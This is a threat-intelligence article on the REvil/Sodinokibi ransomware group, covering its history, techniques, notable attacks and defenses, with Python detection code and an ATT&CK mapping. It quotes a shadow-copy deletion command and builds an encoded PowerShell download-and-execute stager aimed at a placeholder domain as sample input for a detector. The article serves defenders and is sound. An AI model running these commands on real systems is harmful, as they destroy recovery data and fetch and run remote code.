REvil, also known by its ransomware name Sodinokibi, emerged as one of the most notorious and prolific cybercriminal operations in recent history. Operating primarily under a Ransomware-as-a-Service (RaaS) model, REvil provided its potent ransomware code and infrastructure to affiliates, who then carried out devastating attacks across the globe. Known for its brazen tactics, high ransom demands, and targeting of large enterprises and critical infrastructure, REvil exemplified the escalating threat of financially motivated cybercrime. The group pioneered and popularized the "double extortion" tactic – encrypting victim data while simultaneously exfiltrating sensitive information and threatening to leak it publicly on their dedicated "Happy Blog" leak site if ransom demands were not met. Although officially dismantled by international law enforcement efforts in late 2021 and early 2022, REvil's impact, techniques, and the RaaS model it championed continue to influence the threat landscape, making an understanding of its operations crucial for security professionals.
REvil is widely believed to have emerged in April 2019, shortly after the high-profile shutdown of another major RaaS operation, GandCrab. Significant code similarities between GandCrab and Sodinokibi, along with the timing of REvil's appearance, strongly suggest that REvil was either a direct successor, a rebrand, or operated by core members of the former GandCrab team. The name "REvil" itself is thought to be a contraction of "Ransomware Evil," potentially inspired by the Resident Evil video game series, while "Sodinokibi" was derived from an internal name within the malware code.
The group is strongly suspected to have originated from Russia or Russian-speaking regions. This assessment is based on several factors: the malware code included checks to avoid encrypting systems using Russian or other Commonwealth of Independent States (CIS) keyboard layouts or language settings; the group predominantly targeted organizations outside the CIS; and ultimately, Russia's Federal Security Service (FSB) claimed responsibility for dismantling the group's core infrastructure and arresting members in January 2022, following intelligence sharing prompted by pressure from the United States.
REvil rapidly evolved from its inception, quickly gaining notoriety for its effectiveness and the scale of its attacks. The RaaS model allowed it to scale operations significantly, attracting numerous skilled affiliates. Over time, REvil operators refined their malware, improved evasion techniques, and increased their ransom demands substantially, often demanding millions of dollars. The group's infrastructure, including the "Happy Blog," became a central part of their extortion strategy. Despite a temporary disappearance in mid-2021 following the Kaseya attack and subsequent international pressure, the group's infrastructure briefly reappeared before being definitively seized and dismantled by law enforcement efforts known as "Operation GoldDust." Internal conflicts also reportedly plagued the group, including accusations of the core developers cheating affiliates out of ransom payments via a backdoor, which may have contributed to its eventual downfall. An intrusion set tracked as "Water Mare" has been linked to the operators behind REvil, with key figures like "UNKN" (or "Unknown") acting as public faces or recruiters on underground forums before disappearing.
REvil operated a sophisticated RaaS model, leveraging a network of skilled affiliates to execute attacks while the core team maintained the ransomware code, C2 infrastructure, and the payment/leak portal. Their modus operandi involved multiple stages, showcasing a range of advanced TTPs.
Initial Access: Affiliates employed various methods to breach victim networks. Common vectors included:
Exploiting Vulnerabilities: Targeting known vulnerabilities in public-facing applications, such as VPN gateways (Pulse Secure CVE-2019-11510, Fortinet CVE-2018-13379, Citrix CVE-2019-19781) and remote management software (Kaseya VSA CVE-2021-30116).
Phishing Campaigns: Using spear-phishing emails with malicious attachments (often JavaScript or Office documents with macros) or links leading to exploit kits or credential harvesting pages.
Compromised RDP: Brute-forcing or using stolen Remote Desktop Protocol credentials to gain direct access to servers.
Malware Distribution Networks: Leveraging other malware infections like Qakbot or TrickBot as an entry point.
Execution and Persistence: Once initial access was gained, REvil affiliates executed payloads, often using PowerShell or scripting interpreters. Persistence was established through methods like creating scheduled tasks or modifying registry run keys. Later variants introduced the ability to reboot into Safe Mode to bypass security controls during encryption.
Defense Evasion: REvil employed numerous techniques to avoid detection:
Process Injection: Injecting malicious code into legitimate processes (e.g., specifically targeting Ahnlab's `autoup.exe` or PowerShell).
Disabling Security Tools: Terminating processes associated with antivirus, EDR solutions, and backup software. Windows Defender was often specifically targeted.
Deleting Shadow Copies: Using `vssadmin.exe delete shadows /all /quiet` to prevent easy file recovery.
Code Obfuscation: Utilizing multiple layers of obfuscation, particularly in initial droppers (e.g., JavaScript obfuscation, Base64 encoding).
Language/Region Checks: Avoiding execution on systems configured for Russian or CIS languages.
UAC Bypass: Employing techniques to escalate privileges without triggering User Account Control prompts.
Discovery and Lateral Movement: Affiliates performed reconnaissance within the network using tools like AdFind, BloodHound, and NBTScan to map the environment, identify high-value targets, and locate domain controllers. Lateral movement was typically achieved using valid credentials (obtained via tools like Mimikatz, often deployed via frameworks like Cobalt Strike or SharpSploit) in conjunction with protocols like RDP and tools like PsExec.
Credential Access: Dumping credentials from memory using Mimikatz was a common tactic to facilitate lateral movement and privilege escalation.
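The three behaviours described above (shadow-copy deletion, PsExec-based lateral movement and LSASS credential dumping) all leave characteristic Windows telemetry. The following Python is an added example written for this article, not code from the original post or from any REvil sample: it runs three detection rules over constructed Sysmon- and System-log-style event records. The allowlist of processes permitted to open `lsass.exe` and the sample events are constructed for illustration and would need tuning in a real environment.

```python
"""Flag REvil-style shadow-copy deletion, PsExec service installs and LSASS
access in Sysmon / Windows event records.

Example code over constructed events; not from the original article."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Access masks that Mimikatz-style LSASS dumping typically requests:
# 0x1010 = PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION,
# 0x1410 additionally includes PROCESS_QUERY_INFORMATION,
# 0x1fffff = PROCESS_ALL_ACCESS.
SUSPICIOUS_LSASS_ACCESS = {"0x1010", "0x1410", "0x1fffff"}

# Processes expected to open lsass.exe with broad rights (constructed
# allowlist for the example; tune per environment).
LSASS_ACCESS_ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
}


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles %SystemRoot% prefixes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_shadow_copy_deletion(ev: dict) -> Optional[Alert]:
    """T1490: vssadmin.exe delete shadows (Sysmon EID 1 or Security 4688)."""
    if ev.get("EventID") not in (1, 4688):
        return None
    cmd = ev.get("CommandLine", "")
    if (_basename(ev.get("Image", "")) == "vssadmin.exe"
            and re.search(r"\bdelete\s+shadows\b", cmd, re.I)):
        return Alert("T1490 shadow copy deletion", ev["Computer"], cmd)
    return None


def rule_psexec_service(ev: dict) -> Optional[Alert]:
    """T1021.002: PsExec installs its PSEXESVC service (System log EID 7045)."""
    if ev.get("EventID") != 7045:
        return None
    name = ev.get("ServiceName", "").upper()
    image = ev.get("ImagePath", "")
    if name == "PSEXESVC" or _basename(image) == "psexesvc.exe":
        return Alert("T1021.002 PsExec service install", ev["Computer"],
                     f"{name} -> {image}")
    return None


def rule_lsass_access(ev: dict) -> Optional[Alert]:
    """T1003.001: non-allowlisted process opens lsass.exe (Sysmon EID 10)."""
    if ev.get("EventID") != 10:
        return None
    if _basename(ev.get("TargetImage", "")) != "lsass.exe":
        return None
    src = ev.get("SourceImage", "").lower()
    access = ev.get("GrantedAccess", "").lower()
    if access in SUSPICIOUS_LSASS_ACCESS and src not in LSASS_ACCESS_ALLOWLIST:
        return Alert("T1003.001 LSASS memory access", ev["Computer"],
                     f"{src} GrantedAccess={access}")
    return None


RULES = (rule_shadow_copy_deletion, rule_psexec_service, rule_lsass_access)


def detect(events: Iterable[dict]) -> List[Alert]:
    """Apply every rule to every event and collect the alerts."""
    alerts = []
    for ev in events:
        for rule in RULES:
            alert = rule(ev)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe list shadows"},                     # benign
    {"EventID": 7045, "Computer": "SRV02", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 10, "Computer": "DC01", "SourceImage": r"C:\Users\Public\mimi.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "DC01",
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.host}] {a.rule}: {a.detail}")
```

Run against the constructed events, the benign `vssadmin list shadows` and the allowlisted Defender access produce nothing, while the shadow-copy deletion, the PSEXESVC install and the unknown binary reading LSASS each raise one alert. The PsExec rule keys on the service installation rather than the client binary because affiliates routinely rename the PsExec executable but the service name it registers is far less often changed.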
Exfiltration: Before deploying the ransomware, REvil affiliates exfiltrated large volumes of sensitive data using tools like MegaSync, Rclone, or FileZilla. This data formed the basis of their double extortion threat.
Command and Control (C2): Communication with C2 servers often occurred over Tor or via HTTPS, using generated domain lists. Encrypted configuration files dictated C2 details, affiliate IDs (`pid`), campaign IDs (`sub`), exclusion lists, and other operational parameters.
Impact: The final stage involved encrypting files across the compromised network using strong encryption algorithms (like Salsa20 and elliptic-curve cryptography). A ransom note, typically named `[extension]-readme.txt`, was dropped in each directory, directing victims to a Tor-based payment portal. The desktop wallpaper was often changed to display a ransom message. Failure to pay resulted in the publication of stolen data on the "Happy Blog." DDoS attacks were sometimes used as an additional pressure tactic.
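The `[extension]-readme.txt` naming convention gives incident responders a quick way to scope an encryption event from nothing more than a file listing. The following Python is an added example written for this article, not code from the original post or from a REvil sample: given a list of paths, it pairs ransom notes with files carrying the same appended extension and reports how far the encryption reached. The extension pattern (4 to 12 alphanumeric characters) and the sample paths are constructed assumptions for the example, not published indicators.

```python
"""Pair REvil-style "<ext>-readme.txt" ransom notes with the files renamed to
"<name>.<ext>" in a path listing, and summarise the affected scope.

Example IR triage code over constructed paths; not from the original article."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath
from typing import Dict, Iterable

# Assumed note-name pattern for the example: "<ext>-readme.txt" where <ext> is
# the short alphanumeric extension appended to encrypted files.
NOTE_NAME = re.compile(r"^([a-z0-9]{4,12})-readme\.txt$", re.I)


def triage(paths: Iterable[str]) -> Dict[str, dict]:
    """Return, per candidate extension, note count, renamed-file count and the
    directories touched. Extensions with a note but no renamed files are
    dropped so a stray "build-readme.txt" does not register as an incident."""
    notes = defaultdict(list)      # ext -> ransom note paths
    by_suffix = defaultdict(list)  # ext -> files whose last suffix is .ext
    for p in paths:
        path = PureWindowsPath(p)
        m = NOTE_NAME.match(path.name)
        if m:
            notes[m.group(1).lower()].append(path)
        elif path.suffix:
            by_suffix[path.suffix[1:].lower()].append(path)

    findings = {}
    for ext, note_paths in notes.items():
        files = by_suffix.get(ext, [])
        if not files:
            continue
        touched = {str(f.parent) for f in note_paths + files}
        findings[ext] = {
            "notes": len(note_paths),
            "encrypted_files": len(files),
            "directories": sorted(touched),
        }
    return findings


# Constructed sample listing (not real victim data).
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\report.docx.k7d9fa",
    r"C:\Users\alice\Documents\budget.xlsx.k7d9fa",
    r"C:\Users\alice\Documents\k7d9fa-readme.txt",
    r"C:\Users\alice\Pictures\holiday.jpg.k7d9fa",
    r"C:\Users\alice\Pictures\k7d9fa-readme.txt",
    r"C:\Users\alice\Desktop\todo.txt",              # untouched file
    r"D:\share\archive.zip.k7d9fa",                   # encrypted, note not yet written
    r"C:\dev\project\build-readme.txt",               # decoy: nothing renamed to .build
]

if __name__ == "__main__":
    for ext, info in triage(SAMPLE_PATHS).items():
        print(f".{ext}: {info['notes']} notes, {info['encrypted_files']} encrypted files")
        for d in info["directories"]:
            print("   ", d)
```

On the constructed listing the function reports a single extension, `k7d9fa`, with two notes and four renamed files across three directories, and ignores the decoy `build-readme.txt`. In a real engagement the input would be the output of a file-system walk or a DFIR triage collection, and the resulting directory list feeds directly into restore scoping.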
Tools Commonly Associated with REvil Operations: Cobalt Strike, Mimikatz, PsExec, AdFind, BloodHound, SharpSploit, Process Hacker, PC Hunter, Rclone, MegaSync, FileZilla, PowerShell Empire, Qakbot (as delivery).
REvil's primary motivation was financial gain, achieved through large ransom payments and, occasionally, the sale of stolen data. While not explicitly linked to state-sponsored espionage, the group's targeting sometimes overlapped with geopolitical interests, particularly concerning critical infrastructure, though profit remained the driving force.
The potential impact of a REvil attack was severe, including:
Data Breach: Exfiltration of sensitive corporate, customer, or employee data.
Operational Disruption: Encryption of critical systems leading to complete shutdowns of business operations, manufacturing lines, or essential services.
Financial Loss: Costs associated with ransom payments, incident response, recovery efforts, legal fees, and regulatory fines.
Reputational Damage: Loss of customer trust and public confidence following data leaks or service outages.
Supply Chain Effects: Attacks on managed service providers (MSPs) like Kaseya demonstrated the potential for cascading impacts across hundreds or thousands of downstream organizations.
Targeted Industries: REvil was largely indiscriminate but often focused on organizations perceived as having the capacity and incentive to pay large ransoms. Key sectors included:
Information Technology (especially MSPs)
Manufacturing & Food Production (e.g., JBS, Acer, Quanta)
Legal Services
Healthcare
Financial Services
Transportation & Logistics
Retail
Local Government and Educational Institutions
Targeted Regions: REvil operated globally but had a significant focus on North America (particularly the United States) and Europe. As noted, they actively avoided targeting organizations within Russia and the CIS.
REvil was responsible for numerous high-impact ransomware campaigns during its operational period. Some of the most notable include:
Grubman Shire Meiselas & Sacks (May 2020): A high-profile attack against a major entertainment law firm representing numerous celebrities. REvil claimed to have stolen 756GB of data and initially demanded $21 million, later doubling it to $42 million and threatening to release data related to prominent clients, including an unsuccessful extortion attempt against then-President Trump.
Acer (March 2021): The Taiwanese computer manufacturer was hit with a $50 million ransom demand, one of the largest recorded at the time. REvil affiliates claimed to have exploited Microsoft Exchange vulnerabilities to gain access.
Quanta Computer (April 2021): An attack on a major Taiwanese electronics manufacturer and key Apple supplier. REvil stole confidential schematics, including designs for upcoming Apple products, and demanded $50 million.
JBS S.A. (May 2021): A devastating attack on the world's largest meat processing company, forcing the temporary shutdown of facilities in the US, Canada, and Australia, impacting food supply chains. JBS ultimately paid an $11 million ransom in Bitcoin. The White House publicly attributed the attack to REvil.
Kaseya VSA (July 2021): Perhaps REvil's most infamous attack. The group exploited a zero-day vulnerability (CVE-2021-30116) in Kaseya's VSA remote management software, used by MSPs. This supply chain attack allowed REvil to distribute ransomware to potentially thousands of downstream clients globally, causing widespread disruption (e.g., forcing the closure of Coop supermarkets in Sweden). REvil initially demanded $70 million for a universal decryptor. This attack significantly escalated international law enforcement focus on the group.
Defending against threats like REvil requires a multi-layered security strategy focusing on prevention, detection, and response. Given REvil's TTPs, the following defenses are particularly relevant:
Patch Management: Aggressively patch vulnerabilities, especially those in public-facing systems like VPNs, RDP, and management software. Prioritize patches for CVEs known to be exploited by REvil and similar groups.
Secure Remote Access: Harden RDP configurations (disable if unused, use strong passwords, MFA, Network Level Authentication), implement MFA for VPN access, and monitor remote access logs closely.
Email Security: Deploy advanced email filtering solutions to block phishing attempts, malicious attachments, and dangerous links. Conduct regular security awareness training for employees on identifying phishing tactics.
Endpoint Security: Utilize robust Endpoint Detection and Response (EDR) solutions capable of detecting and blocking REvil's TTPs, such as credential dumping (Mimikatz), process injection, lateral movement tools (PsExec), and ransomware behaviors. Keep signatures and behavioral models up-to-date.
Network Segmentation: Segment networks to limit the blast radius of an infection. Prevent lateral movement by restricting communication between segments based on the principle of least privilege.
Least Privilege: Enforce the principle of least privilege for user accounts and service accounts. Limit administrative privileges strictly to those who require them.
PowerShell Security: Enable enhanced PowerShell logging and consider constraining PowerShell usage where possible using policies like Constrained Language Mode.
Backup and Recovery: Implement a robust backup strategy following the 3-2-1 rule (3 copies, 2 different media, 1 offsite/offline/immutable). Regularly test backup restoration procedures. Ensure backups are protected from ransomware encryption (e.g., offline or immutable storage).
Vulnerability Management: Conduct regular vulnerability scanning and penetration testing to identify and remediate weaknesses before they can be exploited.
Threat Intelligence: Stay informed about active ransomware threats, TTPs, and IOCs through threat intelligence feeds and security reports.
Incident Response Plan: Develop and regularly test a comprehensive incident response plan specifically addressing ransomware scenarios, including steps for containment, eradication, recovery, and communication.
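The PowerShell logging recommended above is only useful if the analyst can see past the Base64 layer that REvil droppers and affiliates routinely wrapped their commands in. The following Python is an added example written for this article, not code from the original post: it recovers the UTF-16LE plaintext of a `-EncodedCommand` argument from a process-creation command line and flags the download-cradle and in-memory-execution indicators the defense section calls out. The indicator list and the sample command lines (which point at the reserved `example.invalid` domain) are constructed for the example.

```python
"""Decode PowerShell -EncodedCommand payloads from process-creation command
lines and flag download-cradle / in-memory execution indicators.

Example detection code with constructed input; not from the original article."""
import base64
import re
from typing import Optional

# PowerShell accepts -EncodedCommand, -ec, -e and any unambiguous prefix of
# -EncodedCommand, so match "-e", "-ec", "-enc", "-encoded", ... followed by
# a Base64 blob. "-ExecutionPolicy" does not match because of the required
# whitespace after the flag.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")

INDICATORS = {
    "download cradle": re.compile(
        r"(?i)\b(?:DownloadString|DownloadFile|DownloadData|Net\.WebClient|"
        r"Invoke-WebRequest|iwr|Start-BitsTransfer)\b"),
    "in-memory execution": re.compile(r"(?i)\b(?:Invoke-Expression|iex)\b"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden\b"),
    "no profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "nested base64": re.compile(r"(?i)FromBase64String"),
}
# Indicators strong enough on their own to mark a command line suspicious;
# "-nop" or "-w hidden" alone are common in legitimate automation.
STRONG = {"download cradle", "in-memory execution", "nested base64"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Decode any encoded payload, then scan both the outer command line and
    the decoded script for indicators."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {
        "decoded": decoded,
        "indicators": hits,
        "suspicious": bool(STRONG & set(hits)),
    }


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not captured from a real incident).
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + _encode(
        "IEX (New-Object Net.WebClient).DownloadString("
        "'http://example.invalid/stage2.ps1')"),
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    "powershell.exe -ec " + _encode(r"Get-ChildItem C:\Logs | Measure-Object"),
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyze(line)
        print("SUSPICIOUS" if r["suspicious"] else "ok        ",
              r["indicators"], "| decoded:", r["decoded"])
```

The first sample decodes to a classic download-and-execute stager and is flagged on the strong indicators; the second is a scheduled-task style invocation with only `-NoProfile` and is left alone; the third is encoded but benign, which is exactly the case that makes "alert on any `-enc`" rules too noisy to keep enabled. With Script Block Logging (Event ID 4104) turned on as the section recommends, the same indicator scan can be run over the already-decoded script text, which also catches payloads that were split across several stages.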
The table below maps the techniques observed in REvil (Sodinokibi) operations to MITRE ATT&CK, side by side with NetWalker, another RaaS operation active in the same period, for comparison:

| Tactic | Technique ID | Technique Name | NetWalker | Sodinokibi/REvil |
|---|---|---|---|---|
| Reconnaissance | T1592 | Gather Victim Host Information | Affiliates gather info about target systems before deploying | Discovery phase after initial access |
| Resource Development | T1587.001 | Develop Capabilities: Malware | CIRCUS SPIDER developed and maintained the Netwalker payload | Core group developed Sodinokibi ransomware |
| Initial Access | T1566 | Phishing | Used email lures (e.g., COVID-19) with malicious attachments or links | Common vector via malicious emails/links |
| | T1190 | Exploit Public-Facing Application | Exploited vulnerabilities in VPNs (Pulse Secure), Web Apps (Telerik UI), Citrix Gateway | Exploiting vulnerabilities like CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2021-30116 |
| | T1078 | Valid Accounts | Exploited weak or compromised credentials, especially for RDP | Using stolen or brute-forced RDP/VPN credentials |
| | T1189 | Drive-by Compromise | Not documented | Via exploit kits or compromised websites |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | Frequently used PowerShell for downloading payloads and fileless execution | Heavily used for execution, downloading payloads, defense evasion |
| | T1204.002 | User Execution: Malicious File | Relied on users opening malicious email attachments (e.g., VBScripts) | User interaction needed for phishing attachments |
| | T1059.007 | Command and Scripting Interpreter: JavaScript | Not documented | Used in initial droppers via phishing |
| Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys | Some variants added registry keys for persistence | Common persistence mechanism |
| | T1053.005 | Scheduled Task/Job: Scheduled Task | Potential use of scheduled tasks for persistence or execution | Used for maintaining persistence |
| Privilege Escalation | T1078 | Valid Accounts | Used compromised privileged accounts for broader access | See Initial Access |
| | T1068 | Exploitation for Privilege Escalation | Not documented | Used vulnerabilities like CVE-2018-8453 |
| | T1548.002 | Abuse Elevation Control Mechanism: Bypass UAC | Not documented | Attempted UAC bypass if needed |
| Defense Evasion | T1490 | Inhibit System Recovery | Deleted Volume Shadow Copies using `vssadmin` | Deleting Shadow Copies using `vssadmin` |
| | T1055/T1055.012 | Process Injection/Process Hollowing | Injected code into legitimate processes like `explorer.exe` | Injecting payload into legitimate processes (e.g., Ahnlab) |
| | T1027 | Obfuscated Files or Information | Embedded configuration was often RC4 encrypted. Used dynamic API resolution | Not explicitly documented |
| | T1562.001 | Impair Defenses: Disable or Modify Tools | Attempted to terminate security software processes | Terminating AV/EDR processes |
| | T1070.004 | Indicator Removal on Host: File Deletion | Not documented | Deleting original files after encryption |
| | T1480.001 | Execution Guardrails: Environmental Keying | Not documented | Language/region checks to avoid CIS countries |
| | T1497.001 | Virtualization/Sandbox Evasion: System Checks | Not documented | Basic checks for analysis environments |
| | T1562.009 | Impair Defenses: Safe Mode Boot | Not documented | Later variants used safe mode to bypass defenses during encryption |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | Not documented | Using Mimikatz to extract credentials |
| Discovery | T1083 | File and Directory Discovery | Scanned local drives and network shares for files to encrypt | Identifying files/folders to encrypt/exclude |
| | T1135 | Network Share Discovery | Specifically looked for accessible network shares, including Admin$ | Finding accessible network shares using tools like AdFind/BloodHound |
| | T1082 | System Information Discovery | Gathered basic system info to tailor attack or ransom note | Gathering basic system info for C2 |
| | T1057 | Process Discovery | Not documented | Identifying security processes to terminate |
| | T1016 | System Network Configuration Discovery | Not documented | Understanding network settings |
| | T1049 | System Network Connections Discovery | Not documented | Identifying network shares/connections |
| Lateral Movement | T1021.001 | Remote Services: Remote Desktop Protocol | Used RDP for moving within the network if credentials were obtained | Moving laterally using compromised credentials via RDP |
| | T1021.002 | Remote Services: SMB/Windows Admin Shares | Moved laterally and encrypted files via network shares | Using tools like PsExec with valid credentials |
| Collection | T1119 | Automated Collection | Ransomware automatically collected files for encryption | Ransomware automatically scans and identifies files for encryption |
| | T1560 | Archive Collected Data | Data likely staged and archived before exfiltration | Potentially archiving data before exfiltration |
| Command & Control | T1071.001 | Application Layer Protocol: Web Protocols | Used Tor-based web portals for ransom negotiation and data leak site | HTTPS for C2 communication |
| | T1105 | Ingress Tool Transfer | PowerShell used to download ransomware payload. Cobalt Strike beacons used by affiliates | Not explicitly documented |
| | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Not documented | Encrypting C2 communication/configuration data (e.g., RC4, ECC) |
| | T1132.001 | Data Encoding: Standard Encoding | Not documented | Base64 encoding used in scripts |
| | T1571 | Non-Standard Port | Not documented | Possibly used non-standard ports |
| | T1090.003 | Proxy: Multi-hop Proxy | Not documented | Use of Tor for C2 and payment portal |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Likely exfiltrated data over standard protocols (HTTPS) or custom channels before encryption | Smaller amounts of system data sent over C2 |
| | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud | Stolen data uploaded to attacker-controlled storage before being posted on leak site | Not explicitly documented |
| | T1048 | Exfiltration Over Alternative Protocol | Not documented | Using tools like MegaSync, Rclone, FileZilla for bulk data theft |
| Impact | T1486 | Data Encrypted for Impact | Core function: encrypted files using Salsa20 and demanded ransom | Core ransomware function using Salsa20/AES + ECC/RSA |
| | T1490 | Inhibit System Recovery | Deleting backups/shadow copies increased impact and pressure to pay | Deleting Shadow Copies using `vssadmin` |
| | T1485 | Data Destruction | Deleting shadow copies constitutes a form of data destruction | See Inhibit System Recovery |
| | T1489 | Service Stop | Not documented | Stopping services (e.g., database, backup) to ensure file access |
| | T1561.002 | Disk Wipe: Disk Structure Wipe | Not documented | Some variants might modify boot sectors or MBR |
| | T1491.001 | Defacement: Internal Defacement | Not documented | Changing desktop wallpaper to ransom message |
REvil (Sodinokibi) represented a significant escalation in the ransomware threat landscape between 2019 and 2021. Operating as a highly successful RaaS platform, it empowered numerous affiliates to conduct devastating attacks globally, pioneering double extortion tactics and targeting critical infrastructure for massive financial gain. Likely originating from Russia and evolving from the remnants of GandCrab, REvil's campaigns against entities like JBS and Kaseya caused widespread disruption and prompted concerted international law enforcement action, leading to its eventual takedown. While the core REvil operation has been dismantled, its legacy persists through the widespread adoption of the RaaS model and double extortion tactics by other cybercriminal groups. Understanding REvil's origins, TTPs, and impact remains vital for security professionals seeking to defend against the ever-evolving ransomware threat.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.